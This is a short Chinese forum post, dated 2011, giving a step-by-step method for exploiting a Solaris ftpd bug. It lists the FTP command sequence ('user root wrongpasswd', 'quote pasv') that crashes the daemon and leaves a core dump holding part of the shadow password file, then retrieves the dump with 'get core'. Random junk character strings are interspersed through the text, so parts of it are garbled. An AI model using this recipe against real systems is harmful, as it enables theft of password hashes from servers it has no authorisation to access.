该方法利用了Solaris 操作系统中FTPD的一个BUG,使得用户可以获得该机的口令文件。具体过程如下:& {, [$ a7 U* M- B" ]% B
$ O5 d; Q! V1 ]3 o% j1.通过 ftp 正常登录到目的主机上
( c9 \5 M" ~/ |" u. x9 j; D5 o
1 d% X4 j7 o. O6 A, z2.输入如下命令序列:/ a8 B# K1 _! v- Q% f
& y& G6 B8 a4 h3 t* T8 ]ftp> user root wrongpasswd
. m% y4 X' K( A$ f7 _8 p! i/ z" c, x* u# [8 H" \. K+ d
ftp> quote pasv
5 M% K3 Z3 S( C) o/ V+ E8 W0 P, X/ s* z5 l1 G* ]% O: a
3.这时,ftpd会报错退出,同时会在当前目录下生成一个core,口令文件就包含在这个core中。 U6 j. q i1 n( j
' a. e- h6 c* E) ^6 K% p4.再次进入FTP >get core* g. |0 L0 f7 n4 A$ s" H
; p7 m/ ]: @. T8 A$ @% P" y( z
补充:虽然在core只有一部分shadow,但是对于系统来说已经是致命的打击了# B- M$ [' Y( C: U: `, ~+ \
0 v& F7 o; G4 u1 E0 r" b |
|本地广告联系: QQ:905790666 TEL:13176190456|Archiver|手机版|小黑屋|汶上信息港
( 鲁ICP备19052200号-1 )
发表于 2011-1-12 21:01:38
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
显身卡